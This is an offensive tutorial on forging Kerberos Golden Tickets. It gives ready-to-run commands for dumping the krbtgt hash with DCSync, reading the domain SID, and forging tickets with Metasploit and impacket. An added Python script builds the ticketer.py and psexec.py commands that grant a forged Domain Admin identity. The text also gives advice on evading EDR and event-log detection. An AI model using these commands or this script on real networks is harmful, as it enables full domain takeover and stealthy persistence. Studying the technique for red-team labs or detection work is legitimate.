Golden Ticket Attacks

A Golden Ticket is a forged Kerberos TGT encrypted and signed with the key of the krbtgt account, the secret the KDC uses to protect every TGT in the domain. With the krbtgt NTLM hash (or, better, its AES key) plus the domain SID, we can mint a TGT for any account, put it in Domain Admins through the PAC, and the DC will accept it without ever checking a password. The forged ticket stays valid until the krbtgt password has been rotated twice, because the KDC accepts tickets under the current and the previous key, so this is persistence as much as privilege escalation.

We need two inputs, the krbtgt secret and the domain SID. We can gather both with Secretsdump, NetExec and lookupsid.py, as mimikatz is flagged by almost every EDR now:

Hashes

Secretsdump.py

krbtgt hash

  • We can pull the hashes out of NTDS with DCSync (DRSUAPI replication), which needs an account with replication rights such as a Domain Admin. -just-dc-ntlm returns only the NTLM hashes; use -just-dc instead if you also want the krbtgt AES keys, since an AES256 ticket blends in far better than an RC4 one (etype 0x17 in 4768/4769 events on an AES-capable domain)

$ secretsdump.py [domain]/[username]:'[password]'@[dc-ip] -just-dc-ntlm

Domain SID

Netexec

  • We can use the ldap protocol with --get-sid to read the domain SID (the S-1-5-21-x-y-z value without any trailing RID):

$ nxc ldap [dc-ip] -u '[username]' -p '[password]' --get-sid

lookupsid.py

  • The trailing 0 is the maximum RID to enumerate, so with no RIDs to brute-force lookupsid.py just prints the domain SID. -hashes takes the LM:NT pair as dumped by secretsdump:

$ lookupsid.py -hashes '[hash]' '[domain]/[username]@[DC FQDN]' 0

Forge the Golden Ticket

I was having trouble getting ticketer.py to generate the Golden Ticket, but I was able to generate and apply one to a session with Metasploit's module post/windows/escalate/golden_ticket. After getting a meterpreter session, background it, use this post module, fill in the options and set USE to true before running.

Switch back to the meterpreter session, run shell and then klist to list the tickets and confirm the forged TGT is loaded.
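For the impacket route, the following is an added example (not part of the original notes, and not impacket's own code) that parses the secretsdump.py and lookupsid.py output formats used above and assembles the ticketer.py command from them. It catches the two input mistakes that make a forge fail: pasting the LM:NT pair where ticketer.py wants the NT hash alone, and passing a SID with a RID still appended, which produces a PAC the DC rejects. It prefers the AES256 key when the dump contains one. The sample tool output is constructed with fake secrets, and the domain corp.local and DC dc01.corp.local are assumed names.

```python
import re
import shlex

# Constructed sample of what secretsdump.py -just-dc prints for krbtgt
# (NTLM section, then the "Kerberos keys grabbed" section). Fake values.
SECRETSDUMP_SAMPLE = """\
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1b45a6d7c0de4c3b8e2f1a0c9d8e7f60:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:8c3a1f0e2d4b6a79c1e3f5a7b9d1c3e5f7a9b1c3d5e7f90123456789abcdef01
krbtgt:aes128-cts-hmac-sha1-96:0f1e2d3c4b5a69788796a5b4c3d2e1f0
krbtgt:des-cbc-md5:0102030405060708
"""

# Constructed sample of lookupsid.py output with maxRid 0 (assumed DC name).
LOOKUPSID_SAMPLE = """\
[*] Brute forcing SIDs at dc01.corp.local
[*] Domain SID is: S-1-5-21-1004336348-1177238915-682003330
"""

# krbtgt always has RID 502; the optional "DOMAIN\" prefix appears in some dumps.
KRBTGT_NT_RE = re.compile(
    r'^(?:[^\\:\s]+\\)?krbtgt:502:([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$', re.M)
KRBTGT_KEY_RE = re.compile(
    r'^(?:[^\\:\s]+\\)?krbtgt:(aes256-cts-hmac-sha1-96|aes128-cts-hmac-sha1-96):([0-9a-fA-F]+)$',
    re.M)
# Exactly three sub-authorities: a trailing "-500" style RID is deliberately not matched.
DOMAIN_SID_RE = re.compile(r'\bS-1-5-21-\d+-\d+-\d+')


def parse_krbtgt_secrets(text):
    """Return {'nthash': ..., 'aes256': ...} from secretsdump output; either key may be absent."""
    secrets = {}
    m = KRBTGT_NT_RE.search(text)
    if m:
        # group(1) is the LM hash (usually the empty-LM constant); ticketer wants NT only.
        secrets['nthash'] = m.group(2).lower()
    for etype, key in KRBTGT_KEY_RE.findall(text):
        if etype.startswith('aes256') and len(key) == 64:
            secrets['aes256'] = key.lower()
    if not secrets:
        raise ValueError('no krbtgt (RID 502) secret found in the dump')
    return secrets


def parse_domain_sid(text):
    """Extract the domain SID from lookupsid/nxc output or a pasted SID, dropping any trailing RID."""
    m = DOMAIN_SID_RE.search(text)
    if not m:
        raise ValueError('no S-1-5-21-... domain SID found')
    return m.group(0)


def build_ticketer_cmd(secrets, domain_sid, domain, user='Administrator',
                       user_id=500, groups=(512, 513, 518, 519, 520)):
    """Assemble the ticketer.py argv; AES256 is preferred over the RC4 (NT hash) key."""
    cmd = ['ticketer.py']
    if 'aes256' in secrets:
        cmd += ['-aesKey', secrets['aes256']]
    else:
        cmd += ['-nthash', secrets['nthash']]
    cmd += ['-domain-sid', domain_sid,
            '-domain', domain,
            '-user-id', str(user_id),
            '-groups', ','.join(str(g) for g in groups),
            user]
    return cmd


def build_use_cmds(domain, user, dc_fqdn):
    """Shell lines that load the forged ccache (ticketer names it <user>.ccache) and use it."""
    ccache = f'{user}.ccache'
    return [
        f'export KRB5CCNAME={shlex.quote(ccache)}',
        shlex.join(['psexec.py', '-k', '-no-pass', f'{domain}/{user}@{dc_fqdn}']),
    ]


if __name__ == '__main__':
    secrets = parse_krbtgt_secrets(SECRETSDUMP_SAMPLE)
    sid = parse_domain_sid(LOOKUPSID_SAMPLE)
    print(shlex.join(build_ticketer_cmd(secrets, sid, 'corp.local')))
    for line in build_use_cmds('corp.local', 'Administrator', 'dc01.corp.local'):
        print(line)
```

The group list 512,513,518,519,520 (Domain Admins, Domain Users, Schema Admins, Enterprise Admins, Group Policy Creator Owners) and user ID 500 match ticketer.py's defaults and are what put the forged identity in Domain Admins. After exporting KRB5CCNAME, klist should show the TGT for the chosen user against the domain realm before any of the -k -no-pass tools are tried.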
